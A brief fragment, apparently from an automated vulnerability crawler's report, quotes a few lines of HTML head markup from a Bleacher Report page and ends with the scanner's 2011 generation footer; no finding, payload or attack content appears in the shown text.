   <meta charset="utf-8">
   <title>Bleacher Report</title>
   <link href="/stylesheets/redesign/common/reset.css" media=
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Tue Feb 15 10:08:59 CST 2011.